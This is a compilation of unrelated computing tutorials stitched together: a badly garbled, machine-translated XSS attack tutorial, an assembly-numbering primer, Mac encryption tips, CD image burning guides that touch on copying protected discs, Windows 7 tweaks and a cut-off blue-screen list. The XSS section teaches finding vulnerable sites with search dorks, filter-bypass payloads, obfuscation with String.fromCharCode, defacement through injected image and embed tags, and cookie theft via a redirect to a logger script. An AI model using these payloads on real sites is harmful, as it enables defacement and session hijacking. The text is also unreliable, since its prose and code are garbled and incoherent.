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XSS Tutorial

Section 1 - Understanding XSS
"CSS", also known as "xss" (confused with Cascading Style Sheets Cross Site Scripting) is an open web applications often encountered. attacker to add malicious code xss recognizes opportunities. many types is possible xss attacks. Now here I stand on the most widely used 3 of them will.
I want to talk about the first round of attacks xss URL. This method will not remain on the page xss means. Xss in this case, just get the code and press "submit" we will try to. How we use our own benefit so that more will be mentioned.

The second attack is in the input field. Where would you add Data Add xss often. As an example, using a search engine, we find a great site. Search box "hacker", and he's started. If a page is loaded class that "hacker" found 100 results for the data displayed on the page will see. The case now or run the code? This attack is not possible to run PHP code in HTML and Javascript code to run, but it is possible. In the meantime, make sure this method will not stay on the server.

Third attack method, this method can be added with the code and the code on the site will be permanent. Running PHP and HTML code have two types that are connected. If we inject the same HTML as if we can inject PHP. This kind of attack is usually blogs and profile. Forums and the most you can add data rather than stay in the area where no data are included. HTML, PHP is very different. HTML on your computer, "download" is it in your browser and solutions (and therefore may view page source). With PHP code, which is hosted on the server script is parsed, then the data is sent back to the browser. PHP injection is extremely rare for this condition. Note: PHP code can never be injected into the HTML page.

Section 2 - Finding XSS Open

To find this open blogs, Forums, Shout boxes, comment boxes and you can start by trying search box. In fact, it is possible to give more examples here, nor mentioned.
Google can be used to more easily find Dorks. As an example, by typing inurl: "search.php? Q =" You can write. Now this is a page that can be found very common and many results can be obtained. Attack to find more go to my other plenty. Also note that most of the site's xss vulnerability and a good eye and a bit to find it in the filter to have information about how to do bypass is enough.

Chapter 3 - Basic Concepts on xss

Now the most commonly used to learn from the most common xss to get started.
The most common one <script>alert("xss")</script>.

This code "xss" without the quotation marks, easily editable tab a "popup" warning will.
Therefore, assuming that you mentioned action Remember return to the previous issue, we search.php? Q = a web site that simply can try on.
=<script> alert("xss")</script>

It probably will work, but still does not work, no problem, look at the different sites, although you can experiment with variations. (Too many people, just add HTML is not Javascript aware that they do not think)

<br> <b> <u> = xss </ u> </ b>

If the text is written in bold font and news are open if you push on relevance, and now I know that later we will explain methods you can use.

Chapter 4 - Attack Methods

Yes, now how does it work xss learned it, now we can explain some xss Deface methods. There are many methods that can be used to Deface the most effective and most common of them and I'll stand on.

IMG SRC The first one. For who do not know HTML IMG SRC, the official web site link's he used to show the tags.

<html> <body> <IMG src= "">

Link link with a picture if the current changes, record and will run better understand what I mean.
Now let's say Shout box, Comment box or you've entered your data and confirm, after entering the data that you have found any place showing. Given below have to show picture on the page then I can add a link.
<IMG Src= "">

Do not need them because the page already contains other tags.
This enables your image to appear larger and the site is clearly hacked.
Another method is the use of flash video. The following methods are the same but with a little more different is a way.

<EMBED Src= "">
Here, the flash video itself will be executed links.
Pop or routing may be used or
<script> ( "" )</script>

Chapter 5 - Cookie (Cookie)

Let cookie in logger's site. Now we obtain the file and upload a.php shaped our files are. Log.txt file to create Do not forget to chmod 777 var. Now in any attack, we can perform, a site which is open xss found. Now add the water code;

window.location = "cookie ="+<script>.
<srcipt>. location = "cookie ="+</script>.

Then if you visit the site if the user will be eaten cookie logger. The required information has been sent to the site and cookies will be stolen. The second part is a more clandestine. Add to your file, and then the user's session cookies for the forward. But if you say that such an attack or the possibility of our site, but only the data shows a time and does not hide it? Let us say that we search.php? Q = I in our hands a page, we use the code below and maybe we can get him a malicious url hex code, and people probably will base64 encode it

=<script>. location = " ="+</script> . cookie

Section 6 - Filtering Process to bypass

On most sites, there may seem hungry, but the code does not run, you better make a note of this section to solve. Used to bypass filtering process, some common methods;

') alert (' xss');
"); alert ( 'xss');

They are open on a server with this code <script>alert("xss")</script> they do the same thing. Data to confirm before you can try to Hexing or base 64 encoding. Be sure to water issues; xss's to test ( "xss") to use caution at all to do a good method is not practical because of the sites that I block letters xss know.
Other ways to bypass filtering;

<script Type = text / javascript>alert("PlanetCreator")</script>
<script>alert( "PlanetCreator")</script>;
<script>alert( PlanetCreator");</script>
<script>alert( PlanetCreator"/)<script>
There <script> var = 1; alert (var )</script>

Chapter 7 - Advanced Level xss

This section discusses the main methods which I will examine the firm that is used even more of myself I did not find any ways, I'm sure you will like."Magic Signals" is hungry and therefore use some commands I have seen many sites that make unnecessary. However, using fractions, a technique I met them ASCII's turn.

Necessary functions to convert the fractional numbers ASCII's a table containing all
Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion site can be found. What you want to print this table will help you to write it.

80 108 97 110 101 116 67 114 101 97 116 111 114

Yes, now we get string's decimal values, the things we need to know what function it into Javascript.


This code is suitable for this kind of thing, installation is easy. We give the following from my own argument.

String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)

Yes now
"String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114)"
"PlanetCreator" expression JAVA (ASCII) are in the tab.

And icons for use with this warning, etc. do not need anything because it already serves as the variable itself.

alert (String.fromCharCode (80 108 97 110 101 116 67 114 101 97 116 111 114))

Now in this case "PlanetCreator" tab will show. And this method is called the magic mark is a number in the bypass cursors.
Before continuing to the next section, again using another method of variables than I would like to talk about.
Let's write something to say;

var myVar = 1
myVar longer a tab of saying here are 1.

To use our own favor xss's variables, we can write as follows;

There <script> myVar = 1; alert (myVar )</script>
Here, the variable contents of any sign (quote) without the use will be displayed.

Chapter 8 - xss safety

This section is intended for web developers. How to prepare the code you can make it I will talk about security.
If found to open script' xss URLs, you secure is very simple. Take a look at the following code to tell;
if (isset ($ _POST [ 'form'])){ echo "<html> <body>". $ _POST [' form ']. "</ body> </ html>"

Let's say that $ _POST [ 'from'] variable, and the leak was coming from any input dialog box have been exposed to xss attack. To ensure the security of the latter method is very simple;

$ charset = 'UTF-8', $ data = htmlentities ($ _POST [ 'form'], ENT_NOQUOTES, $ charset);
if (isset ($ data)) (echo "<html> <body>". $ data. "</ body> </ html>"

This line of code will be possible and all of them Share

Coding Assembly in Linux

Assembly nowadays is a hard thing to learn, not because it's difficult but
because people thinks that there is no reason to learn assembly! That's
not true... With assembly you can have total power above the computer, and
know exactly what he's doing. Try to remember that while trying to learn!
You may wondering: Why to read this tut? Good point... There are thousands
of papers for programming assembly in x86. That's true... But did they
teach you how to make apps for linux? Did they talked about linux
interrupts? I don't think so... There are many tutorials about programming
assembly for x86 in dos and windows, but very few on linux. I want to
change that. So this is the first issue of a collection of papers about
that. If you find that this paper has any error, please contact me and let
me know.

##### Index #####

1. Numbering systems
1.1. Decimal system
1.2. Binary system
1.2.1. Converting a binary number to a decimal number
1.2.2. Converting a decimal number to a binary number
1.3. Hexadecimal system
1.4. Conventions
2. Binaries in computers
2.1. Bit
2.2. Nibble
2.3. Byte
2.4. Word
2.5. Double word

###################### 1. Numbering systems ######################

1.1. Decimal system

Nowadays we use the decimal numbering system in almost everything that is
related to numbers. We use it so often and in a natural way that we forget
it's meaning. What is decimal system?

. Every decimal number, has only digits between zero and nine,
making a total of 10 digits
Note: how many fingers do you have? ...10. In fact the decimal
system is bound to human anatomy.
. Ok, and what is the meaning of each digit? Consider the
following numbers: 234 and 234,43
We do some transformations
-> 234 i.e. 200 + 30 + 4 i.e. 2 * 10^2 + 3 * 10^1 + 4 * 10^0
-> 234,43 = 2 * 10^2 + 3 * 10^1 + 4 * 10^0 + 0,43 = 2 * 10^2 + 3 *
10^1 + 4 * 10^0 + 4 * 10^-1 + 3 * 10^-2
Do you see the relation? Each digit appearing to the left of the
decimal point represents a value between zero and nine times an increasing
power of ten. Digits appearing to the right of the decimal point represent
a value between zero and nine times a decreasing power of ten.

1.2. Binary system

Binary system uses only two digits, by convention the digits are 0 and 1.
This system is so widely used in computers... By coincidence or not this
system adjusts perfectly to computers... Computers operate using binary
logic. The computer represents values using two different voltage levels,
in this way we can represent 0 and 1. Like I said before the same applies
to binary system, it is well adjust to computer anatomy!

1.2.1. Converting a binary number to a decimal number
Apply the same rule we saw in 1.1, but with powers of two.
Example: 1010 -> 1 * 2^3 + 0 * 2^2 + 1 * 2^1 + 0 * 2^0 = 10
1.2.2. Converting a decimal number to a binary number

We have two ways to do it: We consecutively divide the decimal value by a power
two(keeping the remainder), while the result of the division is different
than zero. The binary representation is obtained by the sequence of
remainders in the inverse order of the divisions.

Consider the number 10(in decimal):

10 / 2
0 5 / 2
1 2 / 2
0 1 / 2
1 0

So in binary we write 1010 You can try to find out the number by adding powers of two,
that added will produce the decimal result.

Consider for example number 123... hmmm it's a number not less than 2^0
and not greater then 2^7. Cool…

2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0
0 1 1 1 1 0 1 1 because 1 * 2^6 + 1 * 2^5 + 1 *
2^4 + 1 * 2^3 + 0 * 2^2 + 1*2^1 + 1 * 2^0
= 123
Our result is 1111011.

1.3. Hexadecimal system

You saw how many digits took to represent the number 123 in binary. 7
digits! Imagine 1200, 10000,... it hurts. So programmers had to choose
another numbering system, just to "talk" to the machine... and no... it's
not the decimal system!! You saw the trouble we had to convert one simple
number like 10 between decimal and binary... I think you don't want to
spend half of your life doing that. Engineers thought on that and they
elected the hexadecimal system... Hexadecimals is the "english" for
computers. They have two special features:
- They're very compact
- it's simple to convert them to binary and vice-versa. A
hexadecimal number has digits with a value between 0 and 15 times a
certain power of sixteen. Because we only know digits between 0-9 we have
to use six more digits! We can use the 6 first letters of the alphabet.
Let's see a example: FF = 15 * 16^1 + 15 * 16^0 = 255 (16) (10)

Converting between binary and hexadecimal is very easy! To convert binary
to hexadecimal remember that every four digits correspond to a single
hexadecimal digit... to convert back to binary just apply the inverse
rule! Let's take a look at the next example:

110 1011 = 0110 1011 =6B
(2) (16)

It's very easy!! To make things easier, take a look at the following

# D # H # B #
# 0 # 0 # 0000 #
# 1 # 1 # 0001 #
# 2 # 2 # 0010 #
# 3 # 3 # 0011 #
# 4 # 4 # 0100 #
# 5 # 5 # 0101 #
# 6 # 6 # 0110 #
# 7 # 7 # 0111 #
# 8 # 8 # 1000 #
# 9 # 9 # 1001 #
#10 # A # 1010 #
#11 # B # 1011 #
#12 # C # 1100 #
#13 # D # 1101 #
#14 # E # 1110 #
#15 # F # 1111 #

1.4. Conventions

Programming in assembly, requires you to obey some rules when using
numbers, because you can use three different numbering systems.

When writing a number:

- all numbers have to start with a decimal digit
- all numbers end with a letter, indicating the type of number:
. for hexadecimals the letter is h
. binary numbers end with b
. decimals end with t or d We will use the following notation:

Xn Xn-1 ... X2 X1 -> Xi represents a bit, and i<-[0,1,...,n] represents
it's position.

Encrypt Files On Mac OS X

Most people store some kind of data on their computer that they don't want other people to see or use. Whether it is financial information, confidential files for work or files you shouldn't have in the first place, it is often hard to guarantee that no one has seen them. If your computer was stolen, for example, you would hope that the thief would just wipe the hard drive, but there is no way to be sure. Leaving your Mac logged on in the office or at home also allows other people to gain access to your private data.


The easiest and most secure way to protect your files is an encrypted folder. This means that a password is needed to access the files within it, and the files won't show up in Spotlight searches. Moreover, it is almost impossible to decrypt the data without that password, even with data recovery tools.

Mac OS X comes with FileVault, which you can turn on from the System Preferences. However, this really is overkill as it encrypts your entire user folder, including your music, photos and files that really don't need to be protected.

A much better option is to use Disk Utility (located in Applications/Utilities) to create an encrypted disk image. This is just like a normal disk image (downloaded software often comes in one), but to mount it on your desktop you need to provide the correct password.

To create an encrypted disk image, open up Disk Utility, go to the File menu and choose New - Blank Disk Image. In the dialog box that appears choose a name for your disk image and where you want to save it. The size is a maximum that the disk image can hold, so the preset sizes for CDs and DVDs are useful for if you want to burn the contents when it gets full. Choose AES-128 encryption and sparse disk image from the Format drop down menu.

Now when you click Create, you will be prompted to enter your password. To really protect your data, don't choose a password that you use for everything else or something that is easily guess-able. Press the key button next to the password field to open the Password Assistant. This will help you choose a password that is both easy to remember and hard to crack. The best type to choose from the menu is "Memorable" as the others are a bit more complicated. Obviously longer passwords are more secure, but you have to find the right balance. If you don't like the password that the assistant suggests, press the down arrow next to the password to see a list of other suggestions. Alternatively, type in your own password and it will tell you how good it is and give tips on how to improve it.

Remember to deselect the "Remember Password" option before pressing OK, as that would really defeat the point of creating the disk image in the first place. Now your encrypted disk image will be located in where you chose to save it. When you double-click it you will be prompted for the password, then it will mount on your desktop and also appear in the Sidebar of every window.


For some people there is no need to encrypt data. For a quick, temporary solution you can just hide away your files on your Mac. This is much less secure and far from foolproof, but quite often it is as much as you need.

Probably the best place to put your files is in the Library folder. The main benefits of this are that it isn't searched by Spotlight, and that there are hundreds of other files in there already. The Application Support folder in you Library is a good place, as there are all sorts of random files in there. You might also want to rename your file if it has a name that stands out ( super-secret-file.doc for example).

How to make Bin/Cue, and ISO

For ISO also read the BIN/CUE then see ISO. The ISO is like BIN, but ISO does not use CUE, you can use Nero,alcohol120% to burn it or emulate with alcohol or daemon tools.

The .bin file is the single file containing the contents of the CD,DVD which you downloaded. You will also have a .cue file (much smaller size) which goes with the large .bin file. Together, they create the complete "image" of the CD,DVD you chose to download. The purpose of the .cue file is to tell your burning software (for eg, Nero) exactly how to record the data present in the .bin file. Once you have the .bin file and the .cue file for each disc, you may burn the file onto a blank CD-R or DVD. We suggest using Nero or Alcohol 120%.

Along with the large capacity hard disk popularity, people were already used to coping compact discs to CD/DVD image files, generally used is the famous ISO 9660 international standards format, therefore CD/DVD image files are called ISO files. Because the ISO file retained complete data information of the compact disc (including compact disc boot information), you were allowed the convenience to use commonly used CD/DVD burning software (for example Nero-Burning ROM ) to record the disc with your CD-R/RW or DVD-R/RW over and over forever, it can also be used directly through Virtual CD/DVD-ROM drive software (for example Daemon-Tools ) .

How to burn?
Burn them onto a blank CD using the info from .cue
Insert the disc into your CD drive and install the program or game.

Note about burning:
Do not burn it as data cd. Your program should have a wizard for burning images and there you will select the .Cue and it'll give the instructions about how to burn the .Bin. In Alcohol 120% is very easy to do that.
Also .Cue and .Bin should be in the same folder if not it don't work.


Unless otherwise stated, .bin files burn perfectly fine on a normal 700MB CD even though they may seem too big, just ignore the .bin file size. Once you start burning with either Nero or Alcohol, it will tell you the actual size of the .bin file, which will always end up well under 700MB so you have no worries.

I don't have a cd or I don't want to waste one

Then you may do what?s called ?emulating? an ISO or .Bin. This entails making your computer believe it has a new cd-rom drive and that you just inserted the disc into it corresponding to what CD image you load. This can most easily be accomplished with either of two programs: Alcohol 120% or Daemon Tools. Selecting to ?Mount? a disc image in either of the two programs will result in your computer thinking you?ve inserted the disc and you can install or play from there, straight off your hard drive without ever having needed to burn a disc.

How in daemon tools

Right-click on the DAEMON Tools tray-icon
Select Virtual CD/DVD-ROM
Select Device [X]

Click Mount
Browse and select the image you wish to mount
Click OK or double-click on the file to mount.

I don't have a CUE.. What should I do?

Answer: You can create a .cue, here are the steps..

1) Open notepad and put this in it :

FILE "image-name.BIN" BINARY
TRACK 1 MODE2/2352
INDEX 1 00:00:00

2) Change where says "image-name.Bin" to the exact name of your .bin.
Then go to save as and put there save it as "all the files"and put the exacly name of the .BIN just without .BIN and of extension put .CUE and you'll have the .BIN.

Here is Help Burning CD-ROMs from ISO Disc Image Files from GoVideo:
Roxio Easy Media Creator - Version 7.x

1. Insert a blank CD into your CD writer.
2. Launch Easy Media Creator.
3. Click on "Copy Disk" under the Data column. The Roxio Disc Copier utility will launch.
4. In the left column, "Source," click on the Disk Image radio button.
5. Click on the SELECT button and locate the source .ISO file. This would be the location to which you saved the downloaded file.
6. In the right column, "Destination," make sure the Recorder radio button is selected with your CD writer selected in the drop down field.
7. Click on the Burn button in the upper right corner.
8. Click on CLOSE when the process is complete.

NERO Burning ROM
1. Insert a blank CD into your CD writer.
2. Launch Nero Burning CD-ROM.
3. Select "Recorder".
4. In the Recorder Menu, choose "Burn Image".
5. Browse to the location where the ISO image was saved on your hard drive.
6. Select the ISO image file and select Open.
7. Select Burn.
8. Your upgrade CD-ROM will be created.

1)You must use the "Finalize CD" and "Disc-At-Once" option in Nero, or you will get the error: "FATAL ERROR: Installation of side by side assemblies failed" during setup.
2)You must specify *.* for the file type to see the .ISO file.

Veritas RecordNow DX
1. Insert a blank CD into your CD writer.
2. Launch Veritas RecordNow and close the Welcome screen.
3. Click on the IMAGE button in the toolbar at the top.
4. Click on the ADD FILE button in the center of the screen.
5. Click on the record button (red circle).
6. Click on OK.

NTI CD Maker 2000 Professional - Version 4.2.68
1. After starting program, click on 'Custom CD' icon on the "Welcome to CD Maker!" window.
2. This will open the 'Custom CD' window, which includes a Windows Explorer and a Custom CD Track Layout section.
3. On the left side of the Windows Explorer, navigate to and click on the folder where the downloaded ISO file is located.
4. On the right side of the Windows Explorer window, click and hold on the filename of the downloaded ISO file.
5. Drag the file to the bottom portion of the CD Maker window (the 'Custom CD Track Layout:' section).
6. Insert a blank CD into the CD drive.
7. Click on the 'Step 2' button on the left side of the CD Maker window.
8. Your upgrade CD-ROM will be created.

WinOnCD - Power Edition - Version 3.8
1. Start WinOnCD and choose to create a Track Image.
2. Drag the .ISO file into your Track Image window.
3. Click on disc, to start burning the CD.
4. Your upgrade CD-ROM will be created.

Padus DiscJuggler
1. Open Disc Juggler.
2. Choose File, and then New. Click on the "Burn CD and DVD Images" Icon. Press OK.
3. Click on the "Source" disc box, then a Browse window will appear.
4. Locate and click on the .ISO image file, by browsing, using the up arrow buttons near the top of the window. Once found, Open the file.
5. Next to the "Destination" disc box, ensure your CD-R/CD-RW drive is selected.
6. Click the Start button. The burn process will begin.
7. Your upgrade CD-ROM will be created.

1)You cannot use Windows XP alone to burn an ISO image. You must have a 3rd-party CD burning software package such as those listed above.
2)Always use a new blank disc.
3)If you are burning a CD, you should close all other programs while the CD is burning, and let the program run without interruption.
4)When downloading the ISO image file, save it to a folder that is easy to find such as "My Documents";
5)If your CD-ROM burning software is other than those listed, open the program and search "Help" for instructions regarding creating a disc from an ISO file.

1) Open CloneCD
2) Click the second button (Write From Image File)
3) Click 'Browse' and load the .CCD file, then 'Next'
4) The next screen is tricky. Depending upon the icon you choose, CloneCD activates some write option that, on some CDs, may help copying the protection scheme. Try choosing among the default settings or look on the net for the proper settings if you know you're dealing with a protected CD (laserlock, safedisc etc.)
5) OK will activate burning.

BURNING GUIDE WITH ALCOHOL 120% (nearly all image types)
1) Open Alcohol 120%
2) Click on 'Image Burning Wizard'
3) push 'Browse' then load the proper file(.CUE, .CCD, .ISO) file.
4) Now you should see the info of the loaded image. Push 'next'.
5) On the next screen check that your recorder is shown. Look at the 'Datatype' drop-down menu:
6) Change the 'Datatype' drop-down menu according to the protectionyou detected on the original CD (or image). In this example we set 'Playstation' since the CD is a PSX CD. You'll notice that this setting automatically changes Write Method from DAO/SAO to RAW DAO and deselects 'rectify Sub-Channel Data'. Different Datatypes will activate different settings.
6) The write speed is set accordingly to your system resources. Just avoid burning at high speed for PSX CDs (since PSX CD-ROM sucks). Click 'Start' to start burning.
7) On the next screen you are able to keep track of the burning process. Avoid using too many system resources during the burning process.
Cool A popup will inform you at the ending of the burning. The Backup CD has been completed!

1) Open CDRWin.
2) Do not try to unlock CDRWin with illegal codes found on the net: the program will seem to unlock in any case but it will burn coasters if the code is not correct.
3) Click the first button 'Record Disc'
4) Click 'Load Cuesheet' button and load the proper .CUE file. Please note that if you receive errors maybe the image path written on the .CUE might be uncorrect. In this case open the .CUE file with Notepad and check that on the 1st row (FILE "...." BINARY) the correct path of the image (the large file that came with the .CUE) is written. Otherwise, correct it.
5) If you can, click on the 'RAW Mode' button. This is not always necessary, except when the CD is protected. All other options are left blank.
6) Click on 'Start Recording'.

Windows 7 Tip and Tweaks

Windows 7 Keyboard Shortcuts

Let's kick off with keyboard shortcuts – the first thing every power user must memorize with working with a new operating system.
Alt + P

In Windows Explorer, activate an additional file preview pane to the right side of the window with this new shortcut. This panel is great for previewing images in your photos directory.
Windows + + (plus key)
Windows + - (minus key)

Pressing the Windows and plus or minus keys activates the Magnifier, which lets you zoom in on the entire desktop or open a rectangular magnifying lens to zoom in and out of parts of your screen. You can customize the Magnifier options to follow your mouse pointer or keyboard cursor. Keep in mind that so far, the Magnifier only works when Aero desktop is enabled.
Windows + Up
Windows + Down

If a window is not maximized, pressing Windows + Up will fill it to your screen. Windows + Down will minimize that active window. Unfortunately, pressing Windows + Up again while a window is minimized won’t return it to its former state.
Windows + Shift + Up

Similar to the shortcut above, hitting these three keys while a window is active will stretch it vertically to the maximum desktop height. The width of the window will however stay the same. Pressing Windows + Down will restore it to its previous size.
Windows + Left
Windows + Right

One of the new features of Windows 7 is the ability to automatically make a window fill up half of your screen by dragging to the left or right. This pair of shortcuts performs the same function without your mouse. Once a window is fixed to one side of the screen, you can repeat the shortcut to flip it to the other side. This is useful if you’re extending a desktop across multiple monitors, which prevents you from executing this trick with a mouse.
Windows + Home

This shortcut performs a similar function to hovering over a window’s peek menu thumbnail in the Taskbar. The active window will stay on your desktop while every other open application is minimized. Pressing this shortcut again will restore all the other windows.
Windows + E

Automatically opens up a new Explorer window to show your Libraries folder.
Windows + P

Manage your multiple-monitor more efficiently with this handy shortcut. Windows + P opens up a small overlay that lets you configure a second display or projector. You can switch from a single monitor to dual-display in either mirror or extend desktop mode.
Windows + Shift + Left
Windows + Shift + Right

If you are using two or more displays (and who isn’t, these days?), memorize this shortcut to easily move a window from one screen to the other. The window retains its size and relative position on the new screen, which his useful when working with multiple documents. Utilize that real estate!
Windows + [Number]

Programs (and new instances) pinned to your Taskbar can be launched by hitting Windows and the number corresponding to its placement on the Taskbar. Windows + 1, for example, launches the first application, while Windows + 4 will launch the fourth. We realize that this is actually one key-press more than just clicking the icon with your mouse, but it saves your hand the trouble of leaving the comfort of the keyboard.
Windows + T

Like Alt + Tab (still our all time favorite Windows specific shortcut), Windows + T cycles through your open programs via the Taskbar’s peek menu.
Windows + Space

This combo performs the same function as moving your mouse to the bottom right of the Taskbar. It makes every active window transparent so you can view your desktop. The windows only remain transparent as long as you’re holding down the Windows key.
Ctrl + Shift + Click

Hold down Ctrl and Shift while launching an application from the Taskbar or start menu to launch it with full administrative rights.
Ctrl + Click

Hold down Ctrl while repeatedly clicking a program icon in the Taskbar will toggle between the instances of that application, like multiple Firefox windows (though not browser tabs).

Calibrate Text Rendering and Color

The first thing you need to do after a clean install of Windows 7 on a laptop is to tune and calibrate CleartType text and Display Color. Windows 7 includes two built-in wizards that run you through the entire process, pain free.

Launch ClearType Text Tuning by typing “cttune” in the Start Menu search field and opening the search result. You’ll go through a brief series of steps that asks you to identify the best-looking text rendering method.

For Display Color Calibration – very useful if you’re using Windows 7 with a projector or large-screen LCD – search and launch “dccw” from the Start Menu. It’ll run you through a series of pages where you can adjust the gamma, brightness, contrast, and color of the screen to make images look their best.

Better Font Management and a New Graceful Font

Font management is much improved in Windows 7. Gone is the “Add Fonts” dialog , replaced with additional functionality in the Fonts folder. First, the folder shows font previews in each font file’s icon (viewed with Large or Extra Large icons). Fonts from a single set will no longer show up as different fonts and are now combined as a single family (which can be expanded by double clicking the icon). You can also toggle fonts on and off by right clicking a font icon and selected the “hide” option. This will prevent applications from loading the font (and therefore save memory), but keep the file retained in the Font folder.

A new font called Gabriola also comes bundled with Windows 7, which takes advantage of the new OpenType and DirectWrite (Direct2D) rendering.
The Gaming Grotto is a Less Ghetto

One of our biggest pet peeves of Windows Vista is the Games Folder, which we not-so-affectionately refer to as the Gaming Grotto. Games for Windows titles and other game shortcuts would automatically install to this directory, which we could only access with a Start Menu shortcut. The concept wasn’t bad except for the fact that it prevented us from starting a game up from the Start Menu search bar. We could call up any other program by typing its name in the Start Menu field except the games installed to the Games Folder. Fortunately, this oversight is fixed in Windows 7.

Become More Worldly with Hidden Wallpapers

Windows 7 Beta comes with the Betta fish as its default desktop wallpaper, but it also includes six desktop backgrounds catered to your region (as identified when you first installed the OS). US users, for example, get six 1900x1200 images showing off famous National Parks and beaches. The available wallpapers for other regions are still included in a hidden folder.

To access these international wallpapers, bring up the Start Menu search bar and type “Globalization”. The only result should be a folder located in the main Windows directory. You should only be able to see “ELS and “Sorting” folders here so far. Next, search for “MCT” in the top right search bar. This will display five new unindexed folders, each corresponding to a different global region. Browse these folders for extra themes and wallpapers!

Take Control of UAC

Despite good intentions, User Account Control pop-ups were one of the most annoying aspects of Vista, and a feature that most of us immediately disabled after a clean install. UAC in Windows 7 displays fewer warnings, but you can also fine-tune its notification habits by launching the UAC Settings from the start menu. Just type “UAC” in the Start Menu search field and click the result. We find that setting just above “Never notify” gives a comfortable balance between mindful security and incessant nagging.

Calculate your Mortgage and Other Maths Tricks

Wordpad and Paint aren’t the only upgraded programs in Windows 7. The reliable Calculator applet has been beefed up to do more than just basic arithmetic. In Vista, the Calculator had Standard and Scientific modes. Now, you can toggle between Standard, Scientific, Programmer, and even Statistics modes.

In addition, the Options menu lets you pull out many new automated conversation tools, such has Unit Conversion (ie. Angles, Temperature, Velocity, or Volume) and Date Calculation (calculate the difference between two dates). More templates give you the ability to crunch Gas Mileage, Lease, and even Mortgage estimates based on any variables you input.

Track Your Actions with Problem Steps Recorder

The primary reason for releasing the Windows 7 Beta was for Microsoft’s developers to get feedback from users. (Notice the glaring Send Feedback link at the top of every window?) In addition, the devs have built in a diagnostic tool called Problem Steps Recorder that combines screen captures with mouse tracking to record your actions. You can launch this program from the Start Menu by typing “psr.exe” in the search field.

Hit the Record button and Problem Steps Recorder starts tracking your mouse and keyboard input while taking screenshots that correspond with each new action. Stop recording and your session is saved to an HTML slide show recreating your steps, in which you can add comments and annotations. It’s particularly useful if you need to create a tutorial for a computer-illiterate relative.
Explore from “My Computer”

Windows Explorer’s default landing folder is the Libraries directory, but some of us are more comfortable with using “My Computer” as the default node, especially if we use multiple hard drives and external storage devices.

To change the default node, find Windows Explorer in the Start Menu by typing “explorer” in the Start Menu search field and right click the first result. Select “Properties”. Under the Shortcut tab, the Target location should read: %SystemRoot% and the Target should be: %SystemRoot%\explorer.exe

Paste the following in the Target field: %SystemRoot%\explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

New instances of Explorer will open up to “My Computer”. You’ll need to unpin and replace the existing Explorer shortcut from the Taskbar to complete the transition. Just right-click the icon, hit, “Unpin this program from the taskbar” to remove it, and then drag Explorer from the Start Menu back into place.
Burn, Baby, Burn

No more messing around with malware-infected free burning software – Windows 7 comes loaded with DVD and CD ISO burning software. Double-click your image file and Windows will start a tiny program window to help burn your disc. It’s a barebones app, but it works!

Reveal All of Your Drives

If you use built-in memory card readers in a 3.5” drive bay or on your Dell Monitor, empty memory card slots will not show up as drives in My Computer. But that doesn’t mean they’re not still there! To reveal hidden memory card slots, open up My Computer. Press Alt to show the toolbar at the top of the screen, and go to Folder Options under Tools. Hit the View tab and uncheck the “Hide empty drives in the Computer folder” option.

Arrange Your Taskbar (System Tray, Too)

The programs that you pin to your Taskbar can be moved around to any order you want, whether they’re just shortcut icons or actually active applications. We recommend moving frequently used programs and folders to the front of the stack, so it’ll be easily to launch them with the aforementioned Windows + [number] shortcut. The Taskbar, if unlocked, can also be dragged to latch to the left, right, or even top of your desktop. Windows 7 improves side-docked Taskbar support with better gradient rendering and shortcut support. It really works well if you’re using a widescreen monitor.

Just as the Taskbar icons can be rearranged at will, the icons in the System Tray (actually called Notification Area) can be dragged and set to any order as well. Hidden Icons can be dragged back into view, and you can hide icons by dropping them into the Hidden Icon well – which is easier than working through the Notification Area Customization menu.
Bring Quick Launch Back from the Dead

The Quick Launch is superfluous with the presence of the updated Taskbar, but you can still bring it back with the following steps:

• Right-click the Taskbar, hover over Toolbars, and select New Toolbar.
• In the Folder selection field at the bottom, enter the following string:
%userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
• Turn off the “lock the Taskbar” setting, and right-click on the divider. Disable “Show Text” and “Show Title” and set the view option to “Small Icons”.
• Drag the divider to rearrange the toolbar order to put Quick Launch where you want it, and then right-click the Taskbar to lock it again.

Cling to Vista’s Taskbar

Let’s start with the bad news: Windows 7 eliminates the option to use the classic grey Windows 2000-style Taskbar. You’re also committed to the modern version of the Start Menu. But the good news is that you can still tweak the Taskbar to make it run like it did in Windows Vista – replacing the program icons with full names of each open app.

Right-click the Taskbar and hit properties. Check the “use small icons” box and select “combine when Taskbar is full” from the dropdown menu under Taskbar buttons. You still get the peekview thumbnail feature of the Taskbar, and inactive program remain as single icons, but opened programs will display their full names. Combine this with the old-school Quick Launch toolbar to complete the Vista illusion.

Banish Programs to the System Tray

All active programs show up as icons on the Taskbar, whether you want them to or not. While this is useful for web browsing or word processing, your taskbar can get cluttered up with icons you would normally expect to be hidden away, like for Steam or a chat client. You can keep active instances of these programs hidden away in the System Tray/Notification Area by right-clicking their shortcuts, navigating to the Compatibility tab, and selecting “Windows Vista” under the Compatibility Mode drop-down menu. This only works for programs that would previously hide away from the Taskbar in Vista.

Accelerate your Start Menu

The Start Menu hasn’t changed much from Vista, but there are some notable improvements. The default power button is thankfully changed to Shut Down the system, as opposed to Hibernation, as it was in Vista. This can be changed to do other actions from the Start Menu Properties menu.

Additional customization brings Videos and Recorded TV as links or menus to the right side of the Start Menu, next to your Documents, Music, and Games. Feel free to mess around the Customization options since you can always return to the default Start Menu settings by clicking the “default” button at the bottom.

Code Blue Screen Windows XP & Solutions

When Windows XP detects a problem that can not be repaired, Windows XP will display the STOP Message (Message STOP). This message is a message of damage in the form of text that provides information on the condition occurs.

STOP Message sometimes refer to BSOD (Blue Screen of Death) that contain specific information that can help you diagnose and allows you to fix problems detected by the Windows kernel.

Note: This list is not comprehensive and are not intended to resolve any errors / damage. This list is a guide for each message and the possible causes and solutions. With a basic understanding of error messages will also be easier for you to communicate with technical support.

The following list:

1. Stop 0×0000000A or IRQL_NOT_LESS_OR_EQUAL
Message Stop 0 × 0000000A indicates that a kernel-mode process or driver tried to access a memory location but do not have permission (license), or the kernel IRQL (interrupt request level) is too high. Kernel-mode process can access only other processes that have IRQL less than or equal to his own.
This Stop message usually occurs because of an error or not kompatibelnya (not suitable) hardware and software. Could also occur because the BIOS settings are not right.

